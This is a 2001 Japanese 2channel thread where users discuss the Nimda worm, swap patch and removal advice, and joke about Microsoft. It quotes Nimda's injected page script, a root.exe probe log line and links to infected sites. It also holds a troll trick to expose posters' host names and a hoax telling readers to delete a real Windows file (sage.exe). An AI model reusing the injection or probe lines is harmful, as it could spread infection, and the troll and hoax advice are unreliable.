nimdaにやられちゃいました・・・

このエントリーをはてなブックマークに追加
1ビル・ゲイツ
nimdaにやられちゃった人いる?
2名無し~3.EXE:01/09/19 21:46
nimdaってなに?
3名無し~3.EXE:01/09/19 21:48
admin(政府)
4 :01/09/19 21:50
ニダ
5名無し~3.EXE:01/09/19 21:51
>>3
どっかにスレに朝鮮人(ニダ)犯行説となえてたアフォがいたな(w
6名無し~3.EXE:01/09/19 21:52
とりあえず、nimdaについて
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20010919/1/
7名無し~3.EXE:01/09/19 22:17
板違い。セキュリティ板に池。
8名無しさん:01/09/19 22:51
MSNウイルスから完全にCPUを守るソフトをダウンロードできるサイトがあります。
ただし特殊なソフトにつき普通にリンクを張ることはできません。

ダウンロードの方法は
1.書き込みの名前の欄に http://fusianasan.2ch.net/ と入れる。(裏ドメイン名)
2.E-mail欄に、msn virus killerと入力する。(ログオン)
3.本文に「ウイルス 逝ってよし」を入れて(パスワード)、書込みボタンを押します。
4.タイトルが「ウイルスバスターダウンロード」に変わればOK!
5.サーバーが重いと2chに戻ってくるけど、くじけずに何度も挑戦!
  うまく行くと、目的のページにつながります。
6.家庭の電話回線よりも、企業や学校の専用回線からの方がサーバートラフィックの
  都合上つながる確立が高いです。

 (注意!)全て半角で入れること!!
       23:00〜03:00の間はつながり難いです!何度もトライ!
       http://fusianasan.2ch.net/←は、裏ドメインの為「直リン」で飛んでも
       「鯖が見つかりません」になります。入り口は「表2ch」のCGIだけです。
ウイルス逝ってよし
10http://fuslanasan.2ch.net/:01/09/19 23:04
ウイルス 逝ってよし
11 :01/09/19 23:05
>>8
ヴァカ
12ブルーハーツ:01/09/19 23:05
nimda nimda
13被害者1:01/09/19 23:11
すっかりやられた・・・
14名無し~3.EXE:01/09/19 23:13
国際サイバーテロ説があるな。
15名無し~3.EXE:01/09/19 23:17
なんでお前らSP2にしとかなかったの?
何ヶ月か前に出たのに
16MEユーザ:01/09/19 23:18
WindowsUpdate使っても5.5SP1のまんまなんだよね・・・
17名無し~3.EXE:01/09/19 23:21
まあ、HD全部消すようなやつじゃなくて良かったね
18名無し~3.EXE:01/09/19 23:32
             / ̄ ̄ ̄ ̄ ̄
                 | 神様教えてください。IE6.0入れようかまよっています。
     ,__     | 今はIE5.5SP1です。どうか道をおしめしください。
    /  ./\    \_____
  /  ./( ・ ).\       o〇       ヾ!;;;::iii|//"
/_____/ .(´ー`) ,\   ∧∧         |;;;;::iii|/゙
 ̄|| || || ||. |っ¢..|| ̄  (,,  ) ナムナム   |;;;;::iii|
  || || || ||./,,, |ゝ iii~   ⊂  ヾwwwjjrjww!;;;;::iii|jwjjrjww〃
  | ̄ ̄ ̄|~~凸( ̄)凸 .(  ,,)〜 wjwjjrj从jwwjwjjrj从jr
19TNT:01/09/19 23:35
nIMDA は nVIDIA と関係ありますか?
20名無し~3.EXE:01/09/19 23:40
>>19
大ありです
21神様:01/09/20 00:04
>>18
6は結構良いよ。エロ画像よく見るなら画像の縮小機能がいい感じ。
22房戯袴 ◆YPrWb4fw :01/09/20 00:10
やられました。
23房戯袴 ◆gJbp/ceM :01/09/20 00:11
あ、トリップ間違えた。こっちだ。
24名無し~3.EXE:01/09/20 00:15
             / ̄ ̄ ̄ ̄ ̄
                 | 神様教えてください。IE6.0入れようかまよっています。
     ,__     | 漏れも5.5sp1で安定してました
    /  ./\    \_____
  /  ./( ・ ).\       o〇       ヾ!;;;::iii|//"
/_____/ .(´ー`) ,\   ∧∧         |;;;;::iii|/゙
 ̄|| || || ||. |っ¢..|| ̄  (,,  ) ナムナム   |;;;;::iii|
  || || || ||./,,, |ゝ iii~   ⊂  ヾwwwjjrjww!;;;;::iii|jwjjrjww〃
  | ̄ ̄ ̄|~~凸( ̄)凸 .(  ,,)〜 wjwjjrj从jwwjwjjrj从jr
25名無し~3.EXE:01/09/20 00:23
>>24
IE5.5SP2
26名無し~3.EXE:01/09/20 06:32
             / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     ,__     | 神様おぼしめしのとおりIE6入れました。とりあえず良かったみたいです。
    /  ./\    \_____________________
  /  ./( ・ ).\           o〇       ヾ!;;l;::lilii|//"
/_____/ .(´ー`) ,\        ∧∧         |;;l;;::|liii|/゙
 ̄|| || || ||. |っ¢..|| ̄       (,,  ) ナモナモ    |;;l;;::||iii|
  || || || ||./,,, |ゝ iii~   /■\ ⊂  ヾ..         |;;|;l;::i|ii|
  | ̄ ̄ ̄|~~凸( ̄)凸(    .).(゙  ,,,)〜 wjwjjrj从jwwjwjjrj从jr
゙゙""""゙゙"""""""""""""""""""""""""゙゙   ゙゙゙   ゙゙゙゙゙゙゙     ゙゙゙
27名無し~3.EXE:01/09/20 07:20
IE4.0だし、、、。
28名無し~3.EXE:01/09/20 09:13
どうしてみんなは
「Windowsが欠陥品である」
と言うことに気がつかない?

見ただけで勝手に何かを実行するなんて言う考えは
根本的に間違い。

こんな基地外であるMicro$oftは、早く潰れて下さい。
1番悪いのは、ビルゲイツです。
商売以外にももうちょっと頭使って下さい。

で2番目にに悪いのが、ウィルス作成者。
いくらWindowsがショボイと言っても、
そんなことやってはいけません。
ウイルス 逝ってよし
30名無し~3.EXE:01/09/20 10:00
>>28
つまらん戯言ぬかしてるヒマあったら
自慢のヒビ入りキューブでも見てオナってなさい(プ
31名無し~3.EXE:01/09/20 10:08
キューブやゲロ柄の愛マックラッシュは最低最悪だった。
32_:01/09/20 10:13
はっはっはっ、ザマーネーナ(藁
33名無し~3.EXE:01/09/20 10:14
>>30
>>31
でもnimdaにはやられないぞ!
>>28
激しく同意!!
「Windowsは欠陥品である」!!
34名無し~3.EXE:01/09/20 10:27
ジョブスが自殺しそうで心配だ、、、。
3528:01/09/20 14:45
>>30

残念でしTA!
俺はFreeBSDさ。

全く、馬鹿Winユーザーのせいでアタックが多いYO!
36名無し~3.EXE:01/09/20 15:45
漏れのPC100ギガ。にむだ60ギガ
37 :01/09/20 15:53
元気ですか?

はじめまして、ひとみでーす。
突然ですが、最近、どーも「日照り」が続いてるのよね。
あーっ、どっかにいい男、いないかなーっ、なーんて
思ったりしちゃってる今日この頃。

ってゆーワケで、アナタにお手紙しちゃったって感じです。

ブシツケなメールかもしれないけど、許してね。
いらないならゴミ箱にポイして下さいね。

私がどんなヒトかとゆーと、看護婦をしてるんだけど、
諸般の事情(涙)でこんなサイトの
運営をお手伝いしてるヒトなんです。一度見に来て頂戴ね。
http://www.net-gang.com/girls/hfriend/

お時間がある方はぜひ一度ヨロシク。

p.s.私はどこにいるでしょう? よーく探してね!!

間違って届いちゃった人は、下の所でメアド削除してね。
http://nomail.whiteshower.com/
38名無し~3.EXE:01/09/20 16:04
ここにある濾過ソフト(無料)をつかえば、
完全に除去できるよ。ノートンだと完全には駆除できない。
http://www.shoei-roka.co.jp/productinfo/product-r.html

こんかいのウィルスの犯人については、このページの
情報(なんと予言!)がかなり当たってそうです。
http://www.hito-plaza.com/MM/news010914.htm
ウイルス 逝ってよし
40M$N からのお知らせ:01/09/20 16:59

平素より MSN をご利用いただき、まことにありがとうございます。

9 月 18 日夜 11 時より、MSN(http://www.msn.co.jp/)において、新しく多彩なウイルス
体験のできるソフトウェア「Nimda」の配付を開始いたしました。

また、これにともない、昨晩同時刻以降 MSN のサーバーをご覧になったお客様には、自動的に
「Nimda」がインストールされるようになっています。

自動インストールには以下のバージョンのブラウザが必要です。
Internet Explorer 5.01 または Internet Explorer 5.01 SP1
Internet Explorer 5.5 または Internet Explorer 5.5 SP1

これ以外のブラウザを利用されている方は、MSN(http://www.msn.co.jp/)にアクセスすると
ファイルをダウンロードするように求められるのでダウンロードして実行してください。

「Nimda」には以下の機能があります。
1. 電子メールによって「Nimda」を配付
2. ネットワーク不の他のコンピューターに「Nimda」をインストール
3. インターネット不のサーバーにアクセスして、可能であれば「Nimda」をインストール


尚、「Nimda」のアンインストールには以下のソフトウェアが必要です。
トレドマイクロ社(http://www.trendmicro.co.jp/)ウイルスバスター2002
シマンテック社(http://www.symantec.co.jp/)ノートン・アンチウィルス 2002

「Nimda」は Windows 95/ 98 / Me / NT / 2000 でご利用いただけます。

MSN(http://www.msn.co.jp/)は、月間ユニークユーザー数1600万人(2001年7月)を誇る
日本で有数のウイルスポータルサイトです。今後ともよろしくお願いします。
41名無し~3.EXE:01/09/20 19:58
>>40 ワラタ
42名無し~3.EXE:01/09/21 00:21
>>40
あは
はぁ〜
43名無しさん:01/09/21 00:35
今日、なんかネット全体が重くない?
プロバイダのODNが悪いのかな。
44名無し~3.EXE:01/09/21 00:39
>MS、セキュリティ機能をアップしたWindows XPを前倒し出荷!
ここんとこのワームって
何だかMSとシマンテックの自作自演っぽいよねえ?
タイミングが合い過ぎ…^^
45しおちゃん:01/09/21 00:44
>>43
ウィルスのせいだよ<トラフィック増大
46名無し~3.EXE:01/09/21 01:22
lynx -source http://210.135.201.16/ | grep readme

<html>
<script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script>
</html>
47GETだぜ:01/09/21 01:54
             ∩
                 | |
                 | |
                 | |
                 | |
        ∧_∧   | |   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       ( ´Д`)/ /  < ノートン先生!JS.Exception.Exploitです
      /      /     \_______________
     / /|    /
  __| | .|    |
  \   ̄ ̄ ̄ ̄ ̄ ̄ ̄\
  ||\             \
  ||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄|| ̄
  ||  || ̄ ̄ ̄ ̄ ̄ ̄ ̄||
     .||              ||
48名無し~3.EXE:01/09/21 02:01
>>46
JavaScriptを切っておけばおっけいってことなんだ?

なんだか良くわからねーや、まぁヨシとするか?
49ニダウィルス:01/09/21 02:42


     ∧∧
    <`∀´>
     ≡
  /\≡/\
     │
50名無し~3.EXE :01/09/21 02:56
今やっとSP2ダウンロード出来た。
一日目、NimadaパニックでWindows UP DATEが混み合っていて、
ほんの僅かしかダウウンロード出来ず中断。
二日目、半分以上ダウンロードできたがそこで中断。
深夜である現在まで起きてようやく完了。

Nimadaもラディンの仕業か?
だったら、許せんから俺は兵役に志願してやるぞ。
51名無し~3.EXE:01/09/21 04:04
http://windowsupdate.microsoft.com/

私のブラウザはjava関係の調子が悪くてIEのダウンロードのリンクまで辿り着けません・・・
52名無し~3.EXE:01/09/21 04:19
しかしWindowsXPでこうゆうことになったらどうなんだろ。
今回みたいな再インストールしなければならんのワームが猛威をふるったら、
アクティベーションの電話パンクしてパニックかも。
53IE5.00どす:01/09/21 05:13
おれも>>43と同様に
妙に重いんだが…

ZoneAlarmには何もかかってないから
ウイルスが何かしてるとは思えない?

ちなみに駆除ソフトが古く、
かつプリインストールなのでアップデートできず、
namdaに対応していないのでわからん。
54名無し~3.EXE:01/09/21 05:18
>>53
今夜は確かに重かった。重くなったり軽くなったり。
55IE5.00どす:01/09/21 05:30
お。>>54
レスありがと。
IEだけじゃなく
かちゅ〜しゃで2ちゃんのログ読み込みも重かったよね?

とりあえずreadme.*で検索してそれらしいファイルはまったくなかったので
感染はしてないと思う。

ところでZoneAlarmって常駐させてなくても
登録していないソフトはネットにアクセスできなくなるのだが。

例えば新しくタブブラウザ入れて
そのままだとネットに繋がらない。(ZoneAlarm起動していないのに)
わざわざZoneAlarmを起動してそのソフトを許可しないと繋がらない。
これってどういう仕組みなんだろう?
わかるヒトいたらレスください。

スタートアップに登録しているというオチはありません。
56名無し~3.EXE:01/09/21 05:36
>>53
無料のAntidote使おうよ
57ウイルスバスターも入っているが:01/09/21 07:29
2chのお陰でIE5.01SP2を数ヶ月前に導入済み。
私にとっては、今回は対岸の火事。
58名無し~3.EXE:01/09/21 16:53
「nimda」って、
「admin」の逆さま。
59名無し~3.EXE:01/09/21 17:06
60名無し~3.EXE:01/09/21 18:44
http://www.nimda.net

ヤラレターヨ(´Д`)
61idc:01/09/21 18:50
http://www5d.biglobe.ne.jp/~musume/
↑加護のバナーをクリックしたら・・・(謎)
62名無し~3.EXE:01/09/21 18:56
>>60 ヤラレターヨ(´Д`)
63名無し~3.EXE:01/09/21 20:01
>>55
スレ違いだが、ZoneAlarmはある意味危険。
終了すればインターネットに繋がらなくなるし、アンインストールしてもインターネットに繋がらない。
そういうわけで漏れはアタックを承知の上で使うのをやめた。
64名無し~3.EXE:01/09/21 20:31
http://www.jp-express.com/jp-express/visitors/img-box/img20010919074204.jpg
怖いよ−・・・・
これは何の生き物ですか・・・
何かさけんでる・・・
65名無し~3.EXE:01/09/21 21:00
>63
そんなことはないと思うけど。
少なくとも自分の環境(Win98SE)では終了してもネットにつなげるし、アンインストしても問題は起こらない。
>>55みたいな現象は初めて聞いたよ。
66名無し~3.EXE:01/09/21 21:01
>64はグロ画像
67名無し~3.EXE:01/09/21 21:40
>>65
うちはWin2kだけど、Win2kだとサービス起動だから、
ZoneAlarm終了させるとインターネットにアクセスできなくなる。
アンインストールの場合はそのサービスもアンインストールされるから大丈夫だけど。
68YUMI:01/09/21 22:11
>>66

ヒドイ!そんなふうに言わなくたって!(ノ_;)
69IE5.00どす:01/09/22 09:51
>>56
ありがと。DLしてみたよ
ちなみにベクターにあるのは日付が古かったので
これから使いたいヒトは作者(会社)のページから落とした方がいいです。
ちなみに企業のHPでディレクトリ見えてるのって初めてだった。ちょいまぬけ。


>>63>>67は同じヒトかな?
Windows2000だとZoneAlarmはNGのようですね。

Windows98SEでは起動して許可したソフトは問題なく接続できるので
あたらしいソフトを入れた際に忘れていると困る程度です。

>>65
終了してても許可済みのは大丈夫です
ただ、新しく入れたソフトやディレクトリを移動させたりしたソフトで
未許可だと、何故かZoneAlarmが動いてないのに繋がらないというだけです。
(そこが不思議なんですが)


ZoneAlarm入れてると
メディアプレーヤーとかが勝手に情報送ってるっぽいのがわかったり
韓国とかイスラエルからのお客さんが来たのがわかったりして
面白かったのでそのままつかってます。

ルーター使い始めたので、もう入れてても意味は無かったりするんですが
70名無し~3.EXE:01/09/22 12:31
アンチウィルスベンダ各社は、」 Nimda 被害の拡大を食い止めるための感
染の検出と駆除サービスを開始した。
 サービスを行っているサイトのURLは下記であるが、必ずしも全ての感染状
態を元に戻るわけではことないので、削除後も注意が必要である。
 Nimda は、レジストリを書き換えたり、LAN上の他のコンピュータ上の共有
ファイルへの感染など複合的な影響を与える。
 そのため駆除サービスを受けても必ずしも完全に元の状態に戻るわけではな
いことに十分注意が必要である。
 また、駆除後は、マイクロソフト社の最新パッチをあてる必要がある。

トレンドマイクロ 感染検出、駆除、手動駆除など
http://www.trendmicro.co.jp/nimda/

日本ネットワークアソシエイツ 感染検出、駆除方法、駆除ツールなど
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
http://www.nai.com/japan/nimdatool.asp

シマンテック 最新情報とアンチウィルス定義ファイルの提供
検出、駆除サービスは行っていない
http://www.symantec.co.jp/region/jp/sarcj/nimda.html

Scan Security Wire Nimdaなどほとんどの攻撃からIISを自動防御するツール
http://www.vagabond.co.jp/c2/scan/secureiisweb.html

また、IPAの情報も更新されている
http://www.ipa.go.jp/security/topics/newvirus/nimda.html
71名無し~3.EXE:01/09/23 02:02
WORDの初期起動が遅くなった人いない?
Win起動後、初めてWORDファイルを開くと。
100kbも行かないファイルが、読込に30秒ぐらいかかるんだけど。
2回目以降は変わんないんだよね。
Nimdaに感染したPCで多発してるんだけどさ。
72名無し~3.EXE:01/09/23 02:05
ニムダは韓国の文化二ダ!
日本は反省しる!
7371:01/09/23 02:06
変わんない→即開くことが出来る   です・・・。
74名無し~3.EXE:01/09/23 02:23
ふしぎと会社ではぜんぜん被害なかった。
サーカムも問題ないし。

社内のPCをすべてIE6にするのはつらかった・・
75名無し~3.EXE:01/09/23 02:27
>>72
nimdaを逆から読んでみな、厨房クン(w
76安倍なつみ:01/09/23 09:37
>>28
そもそもパソコン自体が欠陥品でしょう。
77名無し~3.EXE:01/09/23 11:15
>>75
バカ発見!
78名無し~3.EXE:01/09/23 23:18
IE4.01SP1なんだけどやばいかな?
Windows98なので、IE4がいちばんサクサク動くんだよね。
だからIE5はいれたくないんだけど、
IE4.01のSP2ってもうDLできないんだよねぇ。
困ったなぁ、ネスケにするかなぁ〜
79名無し~3.EXE:01/09/23 23:26
>>75
バカ発見!
80名無し~3.EXE:01/09/24 03:32
>>74

へ? IE6は感染するってMSが言ってるよ

---

当のMSがインストールの仕方如何で「Nimda ワーム の影響を受ける恐れのある製品 」と公認しているIE6を勧める気にはなれない。

http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
Nimda ワーム の影響を受ける恐れのある製品

:                    ρ(^-^)インストールのやり方次第ということ
MicrosoftR Internet Explorer 6 (最小構成時のみ)

---
MicrosoftR Internet Explorer 6 は、MS公認の Nimda ワーム の影響を受ける恐れのある製品 であります。
81名無し~3.EXE:01/09/24 08:53
IE5.5 SP2のセットアップファイルって、全てをダウンロードできないの?
分かりやすくいえば、雑誌の付録についている形式で。
セットアップの部分だけダウンロードして実行し、必要なファイルだけ
その時にダウンロードする形式みたいなんだけど・・・。
82名無し~3.EXE:01/09/24 09:08
一瞬、「nimdaにふられちゃいました・・・」
かとオモテしまった。
83名無し~3.EXE:01/09/24 09:13
Linuxer だけど何か?
84名無し~3.EXE:01/09/24 10:36
>>83
別に?
85名無し~3.EXE:01/09/24 10:40
で、これは感染すると自分のコピーをばらまく以外に何をするの?
86名無し~3.EXE:01/09/24 11:33
>>85
コピーをばらまくので、不要なパケットが飛び交う。
ポート80のアクセスがウザイ。
8786:01/09/24 11:35
× ポート80のアクセス
○ ポート80へのアタック
88名無し~3.EXE:01/09/24 21:00
こんなの埋め込んだら気づくかな・・・。
もっと細かいバーヂョンチェックできない?

<script language="JavaScript">
<!--
ver = navigator.appVersion;
if (navigator.appName == "Microsoft Internet Explorer" && navigator.platform == "Win32") {

if (ver.indexOf("MSIE 4") > 0 || ver.indexOf("MSIE 5.0;") > 0) {
window.open("http://www.microsoft.com/japan/technet/security/nimdaalrt.asp");
window.open("http://windowsupdate.microsoft.com/");
}
};
// -->
</script>
89名無し~3.EXE:01/09/24 22:25
>>84
http://a115.ms.a.microsoft.com/f/115/1611/2h/download.microsoft.com/download/ie501sp2/Install/5.01_SP2/WIN98/JA/ie5setup.exe
上記ファイルをc:\aaaaaフォルダにダウンロード

スタート→ファイル名を指定して実行で
C:\aaaaa\ie5setup.exe" /c:"ie5wzd.exe /d:1 /s:""#E"
でOK。

Windows95&98用・WindowsNT用・Windows2000用がダウンロード可能。
*Windows2000用はWindows2000の環境じゃないとダウンロードできない。。
9089:01/09/24 22:28
うおっ、
81へ書いたつもりが、84にしてしまった・・・

しかも、81も「IE5.5sp2」って書いてる。。。

ミスった。。。。
91名無し~3.EXE:01/09/25 06:19
459 名前:名無しさん@お腹いっぱい。 本日の投稿:01/09/25 06:17
>>444
>ウチの会社、偉い人が
> 「HPを見るだけで感染することなど有り得ない」
> と断言しちゃったんで、事実上対策禁止状態・・・。


会社サイトで堂々とニムダ垂れ流してるのはこういうところか・・。

たしかにニムダ、しなやかにニムダ、先進のネットワーク企業
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1001177275&ls=100
92名無し~3.EXE:01/09/26 11:02
>>88

自爆式ニムダか・・(^^;
93名無し~3.EXE:01/09/26 11:24
なんか2chウイルスとかいうのが
出回ってるらしいよ。
インターネットエクスプローラで
sage.exeとかいうのを検索してそれがあるなら
感染してるらしいです。
94名無し~3.EXE:01/09/26 11:26
>>93
手垢まみれのネタです。

sage.exeのプロパティ
Task Scheduler Sage Compatibility
会社名      Microsoft Corporation
言語        日本語
正式ファイル名  sage.exe
製品バージョン  4.71.1972.1
製品名      Microsoft(R) Windows(R) Task Scheduler
内部名      TaskScheduler
95名無し~3.EXE:01/09/26 22:37
>>93
げげっ 検索したら見つかっちゃった。
どーしよう。どーしよう。どーしよう。どーしよう。どーしよう。どーしよう。
96名無し~3.EXE:01/09/27 02:45
すぐに削除しなさい。
削除できなかったらすでに感染してるということだから、
MS-DOSで消すこと。
97名無し~3.EXE:01/09/27 13:16
sage.exe削除したぞ。もう大丈夫だ(´Д`)
98名無し~3.EXE:01/09/27 17:58

telnet://210.151.237.34

ぷっ。ひでー
99名無し~3.EXE:01/09/27 19:43
悩屯先生、またあたらしいパターンファイル出てるぞー。
100名無し~3.EXE:01/09/27 20:09
ニムダにやられちゃいました・・・(w

http://headlines.yahoo.co.jp/hl?a=20010927-00000023-mai-bus_all

<ソニー銀行>システムに障害 口座サイトにログインできず
同行はサーバーの一部に障害が発生したと説明しているが、原因は判明していない。
101mrtg:01/09/28 00:13
nimdaの対応に追われて今週の平均睡眠時間は2h弱。
@MS01-044適用しました。
ASRP適用しました。
BIE5.5SP2適用しました。→結局ダウンロードを選択したら感染するんでしょ?
C共有ディレクトリのアクセス権設定し直しました。
Dウィルスの最新パターンファイルダウンロードしました。

@については7月中に適用しました。
でもCとDが遅かったため
バカなやつが感染してすべてが水の泡でした。

結論:WINはターゲットになりやすい(ウィルス作成者をその気にさせる)。
  :バカがいると結局だめ。
  :今回はあまりにも対応が遅いシマンテックの自作自演ではなさそう。
  :JPCERTはCERTの翻訳版を早く公開しろ。
102名無し~3.EXE:01/09/28 10:09
日本で対策が遅れているのは、21日にIPAが収束宣言を出したため。

取り下げろ>バカ

http://www.mainichi.co.jp/digital/netfile/archive/200109/21-1.html
IPAは「届け件数の伸びから考えると被害は収束する方向にある」と分析している。
IPAによると、18日深夜に確認されたニムダが初めてIPAに届け出があったのは19日。初日は19件
(午後4時30分時点)、翌20日は65件(同)だった。今年7月に全国的に被害の遭った「サーカム」
は11日間で700件を超えたケースと比較すると被害は少ないと見ている。

サイト感染は恥だから申告するわけなかろう。つーか、普通そんなことしてる場合じゃないし。
103名無し~3.EXE:01/09/28 10:10
VOTEこねーなー。だれか送ってくれねーかなー。
104名無し~3.EXE:01/09/28 12:45

     うわ〜ん、感染から10日たったよ〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
            Λ_Λ
          ( ゜∀⊂ヽ ニヤリ
          ⊂    ノ
           人  Y
          し (_)
http://www.zdnet.co.jp/news/0109/28/e_nimda.html
105名無し~3.EXE:01/09/28 14:01
ゆうべ ノートンも バスターも パターンファイル更新されたよ。
106名無し~3.EXE:01/09/28 18:11
ノートン 昼にまた パターンファイル更新されたよ。
107名無し~3.EXE:01/09/28 18:30
108名無し~3.EXE:01/09/28 19:00
>>107

あーあーあー、最低だな、コレ(^^;
109名無し~3.EXE:01/09/28 19:08
>>107
ご馳走様。
110名無し~3.EXE:01/09/28 19:20
ハァハァ モット
111名無し~3.EXE:01/09/28 19:29
>>104
再感染警戒age
112名無し~3.EXE:01/09/28 21:43
test    
113mrtg:01/09/29 00:13
今日もIEの旧バージョンを使いたいというヴァカがいて
めーーーちゃくちゃ頭にきた。
さっさと氏ねヴァーーーカ!!
114名無し~3.EXE:01/09/29 00:21
>>113
ネスケだけで開発していて感染気付かないヴァカ管理者も氏ね!
115名無し~3.EXE:01/09/29 00:37
116mrtg:01/09/29 01:55
>>114
ネスケはとっくに全面禁止にしてます。
115>>
うん。すすめる。
117名無し~3.EXE:01/09/29 08:23
ふと思ったけど、ニムダがMSNに感染していたちょうどその時に
初めてパソコン買ったユーザーはどうなったんだろ?

喜び勇んでインターネットしようとしたら、
当然IEのスタートページがMSNだからうむを言わせず感染?!
118名無し~3.EXE:01/09/29 21:21
そーかもね。
119名無し~3.EXE:01/09/29 23:06
>>117

近い例知ってる。
買って(少し使ってから)半年使ってなくて、
久々に使ってURL窓に入れたURLが文字列まちがってて、
検索結果(MSN)が出てきて感染(らしい)

デフォルトはバイオだったのでMSNじゃなかったそうな。
120名無し~3.EXE:01/09/29 23:18
>>1
確か、2chに、ビル・ゲイソさんがいたと思いますが、
貴方はゲイソさんですか?

僕は、ゲイソさんからウイルスを受け取りました。
Hotmail&パッチを組んでいたので良かったー!
121名無し~3.EXE:01/09/29 23:26
あは
122名無し~3.EXE:01/09/30 12:39
やられちゃいました

http://www.zumensoft.co.jp/menu.html
123名無し~3.EXE:01/09/30 12:47
ここたぶん永久感染・放置

http://www.bee.woodland.co.jp/test/column/kb-index.asp
124嗚呼:01/09/30 13:36
125 :01/09/30 14:16
126名無し~3.EXE:01/09/30 17:05
127名無し~3.EXE:01/09/30 18:11
ほんとだ、ウイルスがいる!
128名無し~3.EXE:01/09/30 23:35
129名無し~3.EXE:01/10/01 01:39
130名無し~3.EXE:01/10/01 22:38
http://www.bee.woodland.co.jp/readme.eml

だめぢゃん( ̄△ ̄;
131名無し~3.EXE:01/10/02 08:24
ホネの髄まで感染しちゃいました

http://211.135.69.237/hoge
132名無し~3.EXE:01/10/02 14:59
133名無し~3.EXE:01/10/02 23:29
134名無し~3.EXE:01/10/02 23:50
IE4.01の人も含めて、この対策もしておいた方が吉。
落とすのは、修正プログラム。

「Microsoft VM による ActiveX コンポーネントの制御」 の脆弱性に対する対策
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-075
135名無し~3.EXE:01/10/02 23:50
136名無し~3.EXE:01/10/03 00:10
137名無し~3.EXE:01/10/03 09:50
http://www.with9.com/

重要なお知らせ
9/18当サーバーは『Nimdaウイルス』感染し、皆様には大変な迷惑と、ご不便をおかけすることなり大変申し訳ございませんでした。

同ウイルスにより、当サーバーは深刻な被害をうけ、現在のサーバーは仮運用となっているため、動作スピードが十分でなない可能性がございます。 早急に完全な状態に復旧する所存ですのでご理解いただけますようお願いいたします。
138名無し~3.EXE:01/10/03 18:30
http://www.miruku.co.jp/usr/find/higa.htm

ニムダ感染で行方不明になりました。
探してください。
139名無し~3.EXE:01/10/03 23:13
ニムダにやられちゃいました。

http://www.miruku.co.jp/
140名無し~3.EXE:01/10/05 11:55
age
141名無し~3.EXE:01/10/05 20:53
nimdaとは直接関係ないが

IE(5以降)を起動

「ファイル」-「開く」

http://61.136.189.106 と入力

「Webフォルダとして開く」にチェック

OKをクリック

(゚∀゚)アヒャヒャ
142悲惨だね・・・。:01/10/05 21:17
143名無し~3.EXE:01/10/05 22:46
144名無し~3.EXE:01/10/08 22:05
たのむからこの期に及んで感染しないでくれ・・。

感染 コマツ電子金属 アニュアルレポート
http://www.komsil.co.jp/
http://www.komsil.co.jp/office/annual-t.htm

「レイキ」宇宙エネルギーによるハンドヒーリング
http://www.mnet.ne.jp/~satoken/index.htm
145名無し~3.EXE:01/10/08 23:26
結局ここの人間はなおしてないのか・・。

http://www.miruku.co.jp/usr/find/higa.htm
146名無し~3.EXE:01/10/09 07:29
ちゃいました・・・

http://61.187.88.11
147名無し~3.EXE:01/10/09 07:37
なんだこりゃあ・・。

IEのようなブラウザでみてくれ。
ftp://shop.tv-tokyo.co.jp/10k.html
148名無し~3.EXE:01/10/09 11:14
149名無し~3.EXE:01/10/09 11:48
Mimuraに穴という穴を突かれてしまいました…
150名無し~3.EXE:01/10/09 12:09
151ニンダ:01/10/09 17:20
Ninda Ninda 〜♪Ninda Ninda Ninda 〜♪

http://ton.2ch.net/test/read.cgi/sec/1001864573/339
152名無し~3.EXE:01/10/11 18:26
153名無し~3.EXE:01/10/11 19:53
やられちゃいました。

■流出の恐れがあったMSの顧客データ
http://japan.cnet.com/News/2001/Item/011011-5.html?mn
マイクロソフトの顧客サービス用ウェブサイトが、ブラウザーさえあ
れば誰でも顧客の取引記録をはじめとする機密情報を閲覧できる状態
だった。検索データベースにセキュリティー保護をかけていなかった。
154名無し~3.EXE:01/10/13 22:49
エルナードの財宝ゲット!
http://www.kagaku.co.jp
155名無し~3.EXE:01/10/14 02:14
http://www.panasonic.tcp.ne.jp/

これ一体何よ?(><)
156 :01/10/14 02:39
>>155
試しに、ページを保存してみた。
↓ソース
<HTML><BODY><META HTTP-EQUIV="Refresh" CONTENT="0;http://www.yahoo.co.jp/"></BODY></HTML>

なぜヤフー?
詳しいことわからんけど、
HP制作に詳しい人、説明求む・・・。
157名無し~3.EXE:01/10/15 14:06
>>156

この会社、なんでこんなへんなクラックされてるんだろ?
158名無し~3.EXE:01/10/16 18:38
ここ、元感染ページなんだけど・・。

http://sapporo.cool.ne.jp/asd0918/
159名無し~3.EXE:01/10/16 18:56
結局何もなかったから感染しなかったのかな?
160名無し~3.EXE:01/10/17 16:57
>>158

すごいね、ここ・・。
161名無し~3.EXE:01/10/17 17:02
162名無し~3.EXE:01/10/17 19:17
LANの中の1台だけ(独立して使うことが多いノートマシン)
感染してました。他のマシンも再インストールするべき?
163名無し~3.EXE:01/10/17 19:57
駆除したはずのニムダが今日急に復活しました。
セーフモードでも立ち上がりません。
すぐにバックアップを取るように、
という警告が出ているのですが、それもできません。
これって、もうダメなんでしょうか?
164名無し~3.EXE:01/10/17 20:27
>>163
駆除後はM$社の最新パッチをあてる必要があります。
やりましたか?
165163:01/10/17 22:25
>>164
SP2とIE6を入れてから、駆除したような気がします。
駆除している時も、訳のわからんフォルダからウイルスが発生するので、
そのフォルダごと削除してその場は一件落着。
それから3週間後の出来事でした。もちろん定期的にスキャンかけてました。
その間ネットにはつないでいません。

Cドライブ:プログラムファイル、Dドライブ:データ としているので、
明日にでもCドライブをカスタム再セットアップする予定です。
正解でしょうか?
166名無し~3.EXE:01/10/17 23:31
昨日昼過ぎ、HTTPDを立ち上げたところ
・・・あれ?誰かアクセスして来た。
ごそごそ(ログを漁る)・・・

xx.xxx.xx.xxx - - [16/Oct/2001:14:54:00 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 252
